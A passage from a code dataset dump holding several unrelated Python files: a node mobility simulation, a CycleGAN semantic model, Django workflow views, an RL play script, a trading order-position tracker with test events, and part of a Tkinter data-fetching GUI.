waiting time\nMAX_WT = 100.\n\n# number of steps to ignore before start plotting\nSTEPS_TO_IGNORE = 1000\n\n# set this to true if you want to calculate node contacts\nCALCULATE_CONTACTS = False\n# if calculating contacts, this is the range to be used\n# (if a distance(a,b) < RANGE, then there is a contact betwen a and b)\nRANGE = 1.\n\nif DRAW:\n import matplotlib.pyplot as plt\n fig = plt.figure() # plt.ion()\n ax = plt.subplot(111)\n line, = ax.plot(range(MAX_X), range(MAX_X), linestyle='', marker='.')\n\nstep = 0\nnp.random.seed(0xffff)\n\n# UNCOMMENT THE MODEL YOU WANT TO USE\n\n## Random Walk model\n#rw = random_walk(nr_nodes, dimensions=(MAX_X, MAX_Y))\n\n## Truncated Levy Walk model\nrw = tlw = truncated_levy_walk(nr_nodes, dimensions=(MAX_X, MAX_Y))\n\n## Random Direction model\n#rd = random_direction(nr_nodes, dimensions=(MAX_X, MAX_Y))\n\n## Random Waypoint model\n#rwp = random_waypoint(nr_nodes, dimensions=(MAX_X, MAX_Y), velocity=(MIN_V, MAX_V), wt_max=MAX_WT)\n\n## Gauss-Markov model\n#gm = gauss_markov(nr_nodes, dimensions=(MAX_X, MAX_Y), alpha=0.99)\n\n## Reference Point Group model\n#groups = [4 for _ in range(10)]\n#nr_nodes = sum(groups)\n#rpg = reference_point_group(groups, dimensions=(MAX_X, MAX_Y), aggregation=0.5)\n\n## Time-variant Community Mobility Model\n#groups = [4 for _ in range(10)]\n#nr_nodes = sum(groups)\n#tvcm = tvc(groups, dimensions=(MAX_X, MAX_Y), aggregation=[0.5,0.], epoch=[100,100])\n\nwith writer.saving(fig, \"writer_test.mp4\", 100):\n for xy in rw:\n\n step += 1\n if step % 1000 == 0:\n logger.info('Step %s' % step)\n\n\n\n if step >= STEPS_TO_IGNORE and DRAW:\n\n line.set_data(xy[:, 0], xy[:, 1])\n writer.grab_frame()\n plt.draw()\n\n if step == 10*60*FPG + STEPS_TO_IGNORE:\n sys.exit(0)\n","sub_path":"src/pymobility/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":3026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"430549626","text":"import torch\nimport itertools\nfrom util.image_pool import ImagePool\nfrom .cycle_gan_model import CycleGANModel\nfrom . import networks\nfrom torch.autograd import Variable\nimport numpy as np\nfrom .modules import loss\nfrom util.iter_calculator import IterCalculator\nfrom util.network_group import NetworkGroup\n\nclass CycleGANSemanticModel(CycleGANModel):\n #def name(self):\n # return 'CycleGANModel'\n\n # new, copied from cyclegan model\n @staticmethod\n def modify_commandline_options(parser, is_train=True):\n \"\"\"Add new dataset-specific options, and rewrite default values for existing options.\n\n Parameters:\n parser -- original option parser\n is_train (bool) -- whether training phase or test phase. You can use this flag to add training-specific or test-specific options.\n\n Returns:\n the modified parser.\n\n For CycleGAN, in addition to GAN losses, we introduce lambda_A, lambda_B, and lambda_identity for the following losses.\n A (source domain), B (target domain).\n Generators: G_A: A -> B; G_B: B -> A.\n Discriminators: D_A: G_A(A) vs. B; D_B: G_B(B) vs. A.\n Forward cycle loss: lambda_A * ||G_B(G_A(A)) - A|| (Eqn. (2) in the paper)\n Backward cycle loss: lambda_B * ||G_A(G_B(B)) - B|| (Eqn. (2) in the paper)\n Identity loss (optional): lambda_identity * (||G_A(B) - B|| * lambda_B + ||G_B(A) - A|| * lambda_A) (Sec 5.2 \"Photo generation from paintings\" in the paper)\n Dropout is not used in the original CycleGAN paper.\n \"\"\"\n parser = CycleGANModel.modify_commandline_options(parser,is_train)\n if is_train:\n parser.add_argument('--train_cls_B', action='store_true', help='if true cls will be trained not only on domain A but also on domain B, if true use_label_B needs to be True')\n parser.add_argument('--cls_template', help='classifier/regressor model type, from torchvision (resnet18, ...), default is custom simple model', default='basic')\n parser.add_argument('--cls_pretrained', action='store_true', help='whether to use a pretrained model, available for non \"basic\" model only')\n parser.add_argument('--lr_f_s', type=float, default=0.0002, help='f_s learning rate')\n parser.add_argument('--regression', action='store_true', help='if true cls will be a regressor and not a classifier')\n parser.add_argument('--lambda_sem', type=float, default=1.0, help='weight for semantic loss')\n parser.add_argument('--lambda_CLS', type=float, default=1.0, help='weight for CLS loss')\n parser.add_argument('--l1_regression', action='store_true', help='if true l1 loss will be used to compute regressor loss')\n \n return parser\n \n def __init__(self, opt):\n super().__init__(opt)\n\n # specify the training losses you want to print out. The program will call base_model.get_current_losses\n if self.opt.iter_size == 1:\n losses_G = ['sem_AB', 'sem_BA']\n losses_CLS = ['CLS'] \n else:\n losses_G = ['sem_AB_avg', 'sem_BA_avg']\n losses_CLS = ['CLS_avg']\n\n self.loss_names_G += losses_G\n self.loss_names_CLS = losses_CLS\n\n self.loss_names = self.loss_names_G + self.loss_names_D + self.loss_names_CLS\n \n # specify the models you want to save to the disk. The program will call base_model.save_networks and base_model.load_networks\n if self.isTrain:\n self.model_names += ['CLS']\n \n if self.isTrain:\n self.netCLS = networks.define_C(opt.output_nc, opt.ndf,opt.crop_size,\n init_type=opt.init_type, init_gain=opt.init_gain,\n gpu_ids=self.gpu_ids, nclasses=opt.semantic_nclasses,\n template=opt.cls_template, pretrained=opt.cls_pretrained)\n \n if self.isTrain:\n if opt.regression:\n if opt.l1_regression:\n self.criterionCLS = torch.nn.L1Loss()\n else:\n self.criterionCLS = torch.nn.modules.MSELoss()\n else:\n self.criterionCLS = torch.nn.modules.CrossEntropyLoss()\n \n # initialize optimizers\n self.optimizer_CLS = torch.optim.Adam(self.netCLS.parameters(), lr=opt.lr_f_s, betas=(opt.beta1, 0.999))\n self.optimizers.append(self.optimizer_CLS)\n\n self.rec_noise = opt.rec_noise\n\n if self.opt.iter_size > 1 :\n self.iter_calculator = IterCalculator(self.loss_names)\n for loss_name in self.loss_names:\n setattr(self, \"loss_\" + loss_name, 0)\n\n ###Making groups\n self.group_CLS = NetworkGroup(networks_to_optimize=[\"CLS\"],forward_functions=None,backward_functions=[\"compute_CLS_loss\"],loss_names_list=[\"loss_names_CLS\"],optimizer=[\"optimizer_CLS\"],loss_backward=[\"loss_CLS\"])\n self.networks_groups.append(self.group_CLS)\n \n def set_input(self, input):\n super().set_input(input)\n if 'A_label' in input:\n if not self.opt.regression:\n self.input_A_label = input['A_label'].to(self.device)\n else:\n self.input_A_label = input['A_label'].to(torch.float).to(device=self.device)\n if 'B_label' in input:\n if not self.opt.regression:\n self.input_B_label = input['B_label'].to(self.device)\n else:\n self.input_B_label = input['B_label'].to(torch.float).to(device=self.device)\n \n \n def forward(self):\n super().forward()\n\n if self.isTrain:\n self.pred_real_A = self.netCLS(self.real_A)\n if not self.opt.regression:\n _,self.gt_pred_A = self.pred_real_A.max(1)\n self.pred_real_B = self.netCLS(self.real_B)\n if not self.opt.regression:\n _,self.gt_pred_B = self.pred_real_B.max(1)\n self.pred_fake_A = self.netCLS(self.fake_A)\n self.pred_fake_B = self.netCLS(self.fake_B)\n\n if not self.opt.regression:\n _,self.pfB = self.pred_fake_B.max(1) #beniz: unused ?\n \n \n def compute_CLS_loss(self):\n label_A = self.input_A_label\n # forward only real source image through semantic classifier\n pred_A = self.netCLS(self.real_A)\n if not self.opt.regression:\n self.loss_CLS = self.opt.lambda_CLS * self.criterionCLS(pred_A, label_A)\n else:\n self.loss_CLS = self.opt.lambda_CLS * self.criterionCLS(pred_A.squeeze(1), label_A)\n if self.opt.train_cls_B:\n label_B = self.input_B_label\n pred_B = self.netCLS(self.real_B)\n if not self.opt.regression:\n self.loss_CLS += self.opt.lambda_CLS * self.criterionCLS(pred_B, label_B)\n else:\n self.loss_CLS += self.opt.lambda_CLS * self.criterionCLS(pred_B.squeeze(1), label_B)\n\n def compute_G_loss(self):\n super().compute_G_loss()\n \n # semantic loss AB\n if not self.opt.regression:\n self.loss_sem_AB = self.criterionCLS(self.pred_fake_B, self.input_A_label)\n else:\n self.loss_sem_AB = self.criterionCLS(self.pred_fake_B.squeeze(1), self.input_A_label)\n \n # semantic loss BA\n if hasattr(self,'input_B_label'):\n if not self.opt.regression:\n self.loss_sem_BA = self.criterionCLS(self.pred_fake_A, self.input_B_label)\n else:\n self.loss_sem_BA = self.criterionCLS(self.pred_fake_A.squeeze(1), self.input_B_label)\n else:\n if not self.opt.regression:\n self.loss_sem_BA = self.criterionCLS(self.pred_fake_A, self.gt_pred_B)\n else:\n self.loss_sem_BA = self.criterionCLS(self.pred_fake_A.squeeze(1), self.pred_real_B.squeeze(1))\n \n # only use semantic loss when classifier has reasonably low loss\n #if True:\n if not hasattr(self, 'loss_CLS') or self.loss_CLS.detach().item() > self.opt.semantic_threshold:\n self.loss_sem_AB = 0 * self.loss_sem_AB \n self.loss_sem_BA = 0 * self.loss_sem_BA \n\n self.loss_sem_AB *= self.opt.lambda_sem\n self.loss_sem_BA *= self.opt.lambda_sem\n \n self.loss_G += self.loss_sem_BA + self.loss_sem_AB\n","sub_path":"models/cycle_gan_semantic_model.py","file_name":"cycle_gan_semantic_model.py","file_ext":"py","file_size_in_byte":8555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"298845766","text":"from django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.core.urlresolvers import reverse\nfrom django.shortcuts import render, get_object_or_404\nfrom hr.models import Workflow_object\nfrom workflows.tools.forms import *\nimport base64\nfrom workflows.models import Workflow,State,Transition,WorkflowPermissionRelation,StatePermissionRelation\nfrom workflows.utils import *\nfrom permissions.utils import register_role,register_permission,has_permission,grant_permission\nfrom permissions.models import Permission,PrincipalRoleRelation\nfrom django.contrib.auth.models import User\nfrom pydot import pydot\n\ndef workflow_add(request):\n if request.method == 'POST':\n form = WorkflowAddForm(request.POST, request.FILES)\n if form.is_valid():\n file = request.FILES['file']\n graph = pydot.graph_from_dot_data(file.read())\n workflow = Workflow.objects.create(name = graph.get_name())\n graph.write_png('mysite/media/'+workflow.name+'.png')\n \n nodes = sorted(graph.get_nodes(),key = lambda node:node.get_id())\n for node in nodes:\n state = State.objects.create(name=node.get_name(), workflow= workflow)\n if not node.get_id():\n #state.status = 'hiden'\n state.save()\n if node.get_root():\n workflow.initial_state = state\n \n for edge in graph.get_edges():\n source_state = State.objects.get(name=edge.get_source(),workflow_id=workflow.id)\n destination_state = State.objects.get(name=edge.get_destination(),workflow_id=workflow.id)\n transition= Transition.objects.create(name=\"Make \"+destination_state.name, workflow=workflow, destination=destination_state)\n source_state.transitions.add(transition)\n \n workflow.save()\n \n view = get_object_or_404(Permission, codename='view')\n edit = get_object_or_404(Permission, codename='edit')\n \n WorkflowPermissionRelation.objects.create(workflow=workflow, permission=view)\n WorkflowPermissionRelation.objects.create(workflow=workflow, permission=edit)\n \n return HttpResponseRedirect(reverse('workflows.tools.views.workflows_list'))\n else:\n form = WorkflowAddForm() # An unbound form\n \n return render_to_response('workflow/workflow_add.html', {\n 'form': form,\n }, context_instance=RequestContext(request))\n \ndef workflow_setpermission(request,workflow_id):\n workflow = get_object_or_404(Workflow, id=workflow_id)\n content = open('mysite/media/'+workflow.name+'.png').read()\n file_data = \"data:image/jpeg;base64,\"+base64.b64encode(content)\n states = State.objects.filter(workflow_id=workflow.id)\n #permissions = Permission.objects.all().order_by('id')\n view = get_object_or_404(Permission, codename='view')\n edit = get_object_or_404(Permission, codename='edit')\n roles = Role.objects.all().order_by('id')\n if request.method == 'POST':\n for state in states:\n for role in roles:\n relations = StatePermissionRelation.objects.filter(state_id=state.id, permission_id=view.id, role_id=role.id)\n if relations.count() == 0:\n StatePermissionRelation.objects.create(state=state, permission=view, role=role)\n if request.POST[state.name]:\n selected_role = request.POST[state.name]\n role = get_object_or_404(Role, name=selected_role)\n relations = StatePermissionRelation.objects.filter(state_id=state.id, permission_id=edit.id)\n if relations.count() == 0:\n StatePermissionRelation.objects.create(state=state, permission=edit, role=role)\n else:\n relations.update(role=role)\n \n return HttpResponseRedirect(reverse('workflows.tools.views.workflows_list'))\n \n return render_to_response('workflow/workflow_setpermission.html', {\n 'workflow':workflow,'file_data':file_data,\n 'states':states,'roles':roles\n }, context_instance=RequestContext(request))\n\ndef workflow_object_add(request,workflow_id):\n workflow = get_object_or_404(Workflow, id=workflow_id)\n if request.method == 'POST': # If the form has been submitted...\n #form = WorkflowObjectAddModelForm(request.POST) # A form bound to the POST data\n if request.POST['name']: # All validation rules pass\n workflow_object = Workflow_object.objects.create(name = request.POST['name'])\n set_workflow(workflow_object, workflow)\n \n #grant permission\n roles = Role.objects.all()\n view = get_object_or_404(Permission, codename='view')\n edit = get_object_or_404(Permission, codename='edit')\n for role in roles:\n grant_permission(workflow_object, role, view)\n \n return HttpResponseRedirect(reverse('workflows.tools.views.workflows_list'))\n else:\n form = WorkflowObjectAddForm() # An unbound form\n \n return render_to_response('workflow/workflow_object_add.html', {\n 'form': form,'workflow':workflow,\n }, context_instance=RequestContext(request))\n \ndef workflow_states_list(request,workflow_id,object_id):\n workflow_object = get_object_or_404(Workflow_object, id=int(object_id))\n workflow = get_workflow(workflow_object)\n user = request.user\n #do_transition(),the transition_id from POST\n if has_permission(workflow_object, user, \"edit\"):\n if request.method == 'POST':\n if request.POST['transition_id']:\n transition = get_object_or_404(Transition, id=int(request.POST['transition_id']))\n do_transition(workflow_object,transition,user)\n #state = get_object_or_404(State, id=1)\n #set_state(workflow_object,state)\n \n #return current_state and workflow_states to show in page\n current_state = None\n workflow_states = []\n transitions = []\n states = State.objects.filter(workflow_id=workflow.id).order_by('id')\n if has_permission(workflow_object, user, \"view\"):\n current_state = get_state(workflow_object)\n for state in states:\n #if state.status and 'hiden' in state.status:\n # continue\n #if \"Reject\" not in state.name and \"Failed\" not in state.name and \"Success\" not in state.name:\n workflow_states.append(state)\n \n if has_permission(workflow_object, user, \"edit\"):\n transitions = get_allowed_transitions(workflow_object,user)\n \n content = open('mysite/media/'+workflow.name+'.png').read()\n file_data = \"data:image/jpeg;base64,\"+base64.b64encode(content)\n \n return render_to_response('workflow/states_list.html', {\n 'workflow':workflow,'workflow_states':workflow_states,'transitions':transitions,\n 'current_state':current_state,'object':workflow_object,'file_data':file_data,\n }, context_instance=RequestContext(request))\n\ndef workflows_list(request):\n workflows = Workflow.objects.all().order_by('id')\n return render_to_response('workflow/workflows_list.html', {\n 'workflows':workflows,\n }, context_instance=RequestContext(request))\n\ndef workflow_show(request,workflow_id):\n workflow = get_object_or_404(Workflow, id=int(workflow_id))\n \n content = open('mysite/media/'+workflow.name+'.png').read()\n file_data = \"data:image/jpeg;base64,\"+base64.b64encode(content)\n \n workflows = Workflow.objects.all().order_by('id')\n return render_to_response('workflow/workflow_show.html', {\n 'workflow':workflow,'file_data':file_data\n }, context_instance=RequestContext(request))\n\ndef workflow_objects_list(request,workflow_id):\n #workflows = Workflow.objects.all().order_by('id')\n #workflow_objects = Workflow_object.objects.all().order_by('id')\n workflow = get_object_or_404(Workflow, id=workflow_id)\n workflow_objects = workflow.get_objects()\n return render_to_response('workflow/workflow_objects_list.html', {\n 'workflow':workflow,'workflow_objects':workflow_objects\n }, context_instance=RequestContext(request))\n","sub_path":"apps/workflows/tools/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"453408100","text":"import gym\nimport torch\nfrom drl.common.network import mlp_actor_critic\n\nif __name__ == '__main__':\n saved = torch.load('model.pth')\n env = gym.make(saved['env'])\n state_dict = saved['model']\n ac_kwargs = saved['ac_kwargs']\n net = mlp_actor_critic(env.observation_space, env.action_space, **ac_kwargs)\n net.load_state_dict(state_dict)\n net.eval()\n \n obs = env.reset()\n \n while True:\n a, _ = net.actor(obs)\n obs, rew, done, _ = env.step(a.tolist())\n env.render()\n if done:\n obs = env.reset()\n","sub_path":"drl/algo/actor/vpg/play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"215941502","text":"import ast\n\n\nclass AkunaMarketOrder:\n def __init__(self):\n self.buy_order = {} # To maintain Buy orders. Eg: {Order_id: Quantity}\n self.sell_order = {} # To maintain Sell orders. Eg: {Order_id: Quantity}\n self.cancel = [] # To maintain list of cancelled order ids\n self.order_mapping = {} # To maintain Order mapping. Eg: {Order_id: Company_Symbol}\n self.position = {} # To maintain marking. Eg: {Company_symbol: Marking}\n\n def on_event(self, s):\n dic = (ast.literal_eval(s)) # To convert String JSON to Python Dictionary\n side = ''\n if 'side' in dic: # To check if 'side' key is in input JSON\n side = dic['side']\n type = dic['type']\n if 'symbol' in dic:\n self.order_mapping[dic['order_id']] = dic['symbol']\n if self.order_mapping[dic['order_id']] not in self.position:\n self.position[self.order_mapping[dic['order_id']]] = 0\n if type == 'NEW': # To check if Order type is 'NEW'\n if side == 'BUY': # Check if 'side' is 'BUY'\n self.buy_order[dic['order_id']] = dic['quantity'] # Adds Order_id and Quantity to 'buy_order' Dict\n elif side == 'SELL': # Check if 'side' is 'SELL'\n self.position[dic['symbol']] -= dic['quantity'] # Subtract Sell quantity from the position\n self.sell_order[dic['order_id']] = dic['quantity'] # Add Order_id and Quantity to 'sell_order' Dict\n elif type == 'FILL': # Check if type is 'FILL'\n if dic['remaining_quantity'] == 0: # Check for remaining quantities to be filled\n if dic['order_id'] in self.buy_order:\n self.position[self.order_mapping[dic['order_id']]] += self.buy_order[\n dic['order_id']] # If nothing remaining, update buy position\n del self.buy_order[\n dic['order_id']] # Delete order id from buy_order dict if no remaining quantities\n elif dic['order_id'] in self.sell_order:\n del self.sell_order[\n dic['order_id']] # Delete order id from sell_order dict if no remaining quantities\n else:\n if dic['order_id'] in self.buy_order:\n self.position[self.order_mapping[dic['order_id']]] += dic['filled_quantity']\n self.buy_order[dic['order_id']] = dic[\n 'remaining_quantity'] # Update buy dict with remaining quantities\n elif dic['order_id'] in self.sell_order:\n self.sell_order[dic['order_id']] = dic[\n 'remaining_quantity'] # Update sell dict with remaining quantities\n elif type == 'ORDER_REJECT': # Check if type is 'ORDER_REJECT'\n if dic['order_id'] in self.buy_order: # If order_id in Buy_order dict and is not filled then\n # delete from Buy_order dict\n del self.buy_order[dic['order_id']]\n else:\n # Add to position if order is rejected\n self.position[self.order_mapping[dic['order_id']]] += self.sell_order[dic['order_id']]\n del self.sell_order[dic['order_id']] # Delete from Sell_Order Dict\n elif type == 'CANCEL': # Check if type is 'CANCEL'\n if (dic['order_id'] in self.buy_order) or (dic['order_id'] in self.sell_order): # If order is in Buy_order\n # dict or Sell_order dict Add to cancelled list\n self.cancel.append(dic['order_id'])\n elif type == 'CANCEL_REJECT': # Remove order id from the list if Cancel Reject is passed\n if (dic['order_id']) in self.cancel:\n self.cancel.remove(dic['order_id'])\n elif type == 'CANCEL_ACK': # Check if type is 'CANCEL_ACK'\n if dic['order_id'] in self.cancel: # If Order was cancelled before then add update position\n if dic['order_id'] in self.buy_order:\n del self.buy_order[dic['order_id']] # Since position not updates, just delete from buy_order dict\n else:\n self.position[self.order_mapping[dic['order_id']]] += self.sell_order[\n dic['order_id']] # Update position\n del self.sell_order[dic['order_id']] # Delete from sell_order dict\n return self.position[self.order_mapping[dic['order_id']]]\n\n\ns1 = '{\"type\": \"NEW\", \"symbol\": \"AAPL\", \"order_id\": 1, \"side\": \"BUY\", \"quantity\": 1700, \"time\": \"2017-03-15T10:15:20.178562\"}'\ns21 = '{\"type\": \"ORDER_ACK\", \"order_id\": 1, \"time\": \"2017-03-15T10:15:20.178725\"}'\ns2 = '{\"type\": \"FILL\", \"order_id\": 1, \"filled_quantity\": 1700, \"remaining_quantity\": 0, \"time\": \"2017-03-15T10:15:20.178839\"}'\ns3 = '{\"type\": \"NEW\", \"symbol\": \"AAPL\", \"order_id\": 2, \"side\": \"SELL\", \"quantity\": 900, \"time\": \"2017-03-15T10:15:20.178956\"}'\ns4 = '{\"type\": \"CANCEL\", \"order_id\": 2, \"time\": \"2017-03-15T10:15:20.179069\"}'\ns5 = '{\"type\": \"ORDER_ACK\", \"order_id\": 2, \"time\": \"2017-03-15T10:15:20.179166\"}'\ns6 = '{\"type\": \"FILL\", \"order_id\": 2, \"filled_quantity\": 900, \"remaining_quantity\": 0, \"time\": \"2017-03-15T10:15:20.179271\"}'\ns7 = '{\"type\": \"CANCEL_REJECT\", \"order_id\": 2, \"reason\": \"ORDER_ID_UNKNOWN\", \"time\": \"2017-03-15T10:15:20.179373\"}'\ns8 = '{\"type\": \"NEW\", \"symbol\": \"MSFT\", \"order_id\": 3, \"side\": \"SELL\", \"quantity\": 1900, \"time\": \"2017-03-15T10:15:20.179572\"}'\ns9 = '{\"type\": \"ORDER_ACK\", \"order_id\": 3, \"time\": \"2017-03-15T10:15:20.179848\"}'\ns10 = '{\"type\": \"CANCEL\", \"order_id\": 3, \"time\": \"2017-03-15T10:15:20.179950\"}'\ns11 = '{\"type\": \"CANCEL_ACK\", \"order_id\": 3, \"time\": \"2017-03-15T10:15:20.180047\"}'\ns12 = '{\"type\": \"NEW\", \"symbol\": \"AAPL\", \"order_id\": 4, \"side\": \"SELL\", \"quantity\": 600, \"time\": \"2017-03-15T10:15:20.180214\"}'\ns13 = '{\"type\": \"ORDER_ACK\", \"order_id\": 4, \"time\": \"2017-03-15T10:15:20.180319\"}'\ns14 = '{\"type\": \"CANCEL\", \"order_id\": 4, \"time\": \"2017-03-15T10:15:20.180406\"}'\ns15 = '{\"type\": \"CANCEL_REJECT\", \"order_id\": 4, \"reason\": \"\", \"time\": \"2017-03-15T10:15:20.180505\"}'\ns16 = '{\"type\": \"NEW\", \"symbol\": \"MSFT\", \"order_id\": 5, \"side\": \"SELL\", \"quantity\": 2000, \"time\": \"2017-03-15T10:15:20.180679\"}'\ns17 = '{\"type\": \"ORDER_REJECT\", \"order_id\": 5, \"reason\": \"FIRM_RISK_LIMIT_EXCEEDED\", \"time\": \"2017-03-15T10:15:20.180825\"}'\ns18 = '{\"type\": \"NEW\", \"symbol\": \"SPY\", \"order_id\": 6, \"side\": \"BUY\", \"quantity\": 200, \"time\": \"2017-03-15T10:15:20.180958\"}'\ns19 = '{\"type\": \"ORDER_ACK\", \"order_id\": 6, \"time\": \"2017-03-15T10:15:20.181062\"}'\ns20 = '{\"type\": \"FILL\", \"order_id\": 6, \"filled_quantity\": 60, \"remaining_quantity\": 140, \"time\": \"2017-03-15T10:15:20.181170\"}'\n\nc = AkunaMarketOrder()\nprint(c.on_event(s1))\nprint(c.on_event(s21))\nprint(c.on_event(s2))\nprint(c.on_event(s3))\nprint(c.on_event(s4))\nprint(c.on_event(s5))\nprint(c.on_event(s6))\nprint(c.on_event(s7))\nprint(c.on_event(s8))\nprint(c.on_event(s9))\nprint(c.on_event(s10))\nprint(c.on_event(s11))\nprint(c.on_event(s12))\nprint(c.on_event(s13))\nprint(c.on_event(s14))\nprint(c.on_event(s15))\nprint(c.on_event(s16))\nprint(c.on_event(s17))\nprint(c.on_event(s18))\nprint(c.on_event(s19))\nprint(c.on_event(s20))\n","sub_path":"AkunaCapital/Sharvil_MarketOrder.py","file_name":"Sharvil_MarketOrder.py","file_ext":"py","file_size_in_byte":7158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"114854447","text":"# fetch_files tab for bfit\n# Derek Fujimoto\n# Nov 2017\n\nfrom tkinter import *\nfrom tkinter import ttk, messagebox, filedialog\nimport numpy as np\nimport pandas as pd\nfrom bdata import bdata\nimport datetime\nfrom functools import partial\nimport matplotlib.pyplot as plt\n\n__doc__=\"\"\"\n To-do:\n scrollbar for lots of runs selected\n \"\"\"\n\n# =========================================================================== #\n# =========================================================================== #\nclass fetch_files(object):\n \"\"\"\n Data fields:\n year: StringVar of year to fetch runs from \n run: StringVar input to fetch runs.\n data: dictionary of bdata obj, keyed by run number\n bfit: pointer to parent class\n data_lines: dictionary of dataline obj, keyed by run number\n fet_entry_frame: frame of fetch tab\n check_rebin: IntVar for handling rebin aspect of checkall\n check_bin_remove: StringVar for handing omission of 1F data\n check_state: BooleanVar for handling check all\n \"\"\"\n \n runmode_relabel = {'20':'SLR','1f':'1F','2e':'2e','1n':'Rb Cell Scan'}\n run_number_starter_line = '40001 40005-40010 (run numbers)'\n bin_remove_starter_line = '1 5 100-200 (omit bins)'\n \n # ======================================================================= #\n def __init__(self,fetch_data_tab,bfit):\n \n # initialize\n self.bfit = bfit\n self.data = {}\n self.data_lines = {}\n self.fit_input_tabs = {}\n self.check_rebin = IntVar()\n self.check_bin_remove = StringVar()\n self.check_state = BooleanVar()\n self.fetch_data_tab = fetch_data_tab\n \n # Fetch Tab ---------------------------------------------------------\n fet_entry_frame = ttk.Labelframe(fetch_data_tab,text='Specify Files')\n self.year = StringVar()\n self.run = StringVar()\n \n self.year.set(datetime.datetime.now().year)\n \n entry_year = ttk.Entry(fet_entry_frame,\\\n textvariable=self.year,width=5)\n entry_run = ttk.Entry(fet_entry_frame,\\\n textvariable=self.run,width=60)\n entry_run.insert(0,self.run_number_starter_line)\n entry_fn = partial(on_entry_click,text=self.run_number_starter_line,\\\n entry=entry_run)\n on_focusout_fn = partial(on_focusout,text=self.run_number_starter_line,\\\n entry=entry_run)\n entry_run.bind('', entry_fn)\n entry_run.bind('', on_focusout_fn)\n entry_run.config(foreground='grey')\n \n # fetch and clear button\n fetch = ttk.Button(fet_entry_frame,text='Fetch',command=self.get_data)\n \n # grid and labels\n fet_entry_frame.grid(column=0,row=0,sticky=(N,E))\n ttk.Label(fet_entry_frame,text=\"Year:\").grid(column=0,row=0,\\\n sticky=(E))\n entry_year.grid(column=1,row=0,sticky=(E))\n ttk.Label(fet_entry_frame,text=\"Run Number:\").grid(column=2,row=0,\\\n sticky=(E))\n entry_run.grid(column=3,row=0,sticky=(E))\n fetch.grid(column=4,row=0,sticky=(E))\n \n # padding \n for child in fet_entry_frame.winfo_children(): \n child.grid_configure(padx=5, pady=5)\n \n # detected run mode label \n runmode_label_frame = ttk.Labelframe(fetch_data_tab,pad=(10,5,10,5),\\\n text='Run Mode',)\n \n self.runmode_label = ttk.Label(runmode_label_frame,text=\"\",font='bold',justify=CENTER)\n \n # bigright frame : hold everything on the right\n bigright_frame = ttk.Frame(fetch_data_tab,pad=5)\n \n # rightframe\n right_frame = ttk.Labelframe(bigright_frame,\\\n text='Operations on Checked Items',pad=5)\n \n check_remove = ttk.Button(right_frame,text='Remove',\\\n command=self.remove_all,pad=5)\n check_draw = ttk.Button(right_frame,text='Draw',\\\n command=self.draw_all,pad=5)\n \n check_set = ttk.Button(right_frame,text='Set',\\\n command=self.set_all)\n check_rebin_label = ttk.Label(right_frame,text=\"SLR Rebin:\",pad=5)\n check_rebin_box = Spinbox(right_frame,from_=1,to=100,width=3,\\\n textvariable=self.check_rebin)\n check_bin_remove_entry = ttk.Entry(right_frame,\\\n textvariable=self.check_bin_remove,width=20)\n check_all_box = ttk.Checkbutton(right_frame,text='Check all',\\\n variable=self.check_state,onvalue=True,offvalue=False,pad=5,\\\n command=self.check_all)\n self.check_state.set(False)\n \n # add grey to check_bin_remove_entry\n check_bin_remove_entry.insert(0,self.bin_remove_starter_line)\n \n check_entry_fn = partial(on_entry_click,\\\n text=self.bin_remove_starter_line,\\\n entry=check_bin_remove_entry)\n \n check_on_focusout_fn = partial(on_focusout,\\\n text=self.bin_remove_starter_line,\\\n entry=check_bin_remove_entry)\n \n check_bin_remove_entry.bind('', check_entry_fn)\n check_bin_remove_entry.bind('', check_on_focusout_fn)\n check_bin_remove_entry.config(foreground='grey')\n \n # grid\n runmode_label_frame.grid(column=1,row=0,sticky=(W,E))\n self.runmode_label.grid(column=0,row=0,sticky=(W,E))\n \n bigright_frame.grid(column=1,row=1,sticky=(E,N))\n \n right_frame.grid(column=0,row=0,sticky=(N))\n check_all_box.grid( column=0,row=0,sticky=(N))\n check_remove.grid( column=1,row=2,sticky=(N))\n check_draw.grid( column=0,row=2,sticky=(N))\n check_rebin_label.grid( column=0,row=3)\n check_rebin_box.grid( column=1,row=3)\n check_bin_remove_entry.grid(column=0,row=4,sticky=(N))\n check_set.grid( column=0,row=5,sticky=(N))\n \n bigright_frame.grid(rowspan=20)\n check_all_box.grid(columnspan=2)\n check_bin_remove_entry.grid(columnspan=2)\n check_set.grid(columnspan=2)\n \n check_rebin_box.grid_configure(padx=5,pady=5)\n check_rebin_label.grid_configure(padx=5,pady=5)\n check_set.grid_configure(padx=5,pady=5)\n \n # drawing style\n style_frame = ttk.Labelframe(bigright_frame,text='Drawing Quantity',\\\n pad=5)\n entry_asym_type = ttk.Combobox(style_frame,\\\n textvariable=self.bfit.fileviewer.asym_type,state='readonly',\\\n width=15)\n entry_asym_type['values'] = self.bfit.fileviewer.asym_dict_keys\n \n style_frame.grid(column=0,row=1,sticky=(W,N))\n entry_asym_type.grid(column=0,row=0,sticky=(N))\n entry_asym_type.grid_configure(padx=24)\n \n # passing\n self.entry_run = entry_run\n self.entry_year = entry_year\n self.check_rebin_box = check_rebin_box\n self.check_bin_remove_entry = check_bin_remove_entry\n self.check_all_box = check_all_box\n \n # ======================================================================= #\n def check_all(self):\n \"\"\"Check all tickboxes\"\"\"\n state = self.check_state.get()\n for k in self.data_lines.keys():\n self.data_lines[k].check_state.set(state)\n \n # ======================================================================= #\n def draw_all(self):\n \n # condense drawing into a funtion\n def draw_lines():\n for r in self.data_lines.keys():\n if self.data_lines[r].check_state.get():\n self.data_lines[r].draw()\n \n # get draw style\n style = self.bfit.draw_style.get()\n \n # make new figure, draw stacked\n if style == 'stack':\n plt.figure()\n draw_lines()\n \n # overdraw in current figure, stacked\n elif style == 'redraw':\n plt.clf()\n self.bfit.draw_style.set('stack')\n 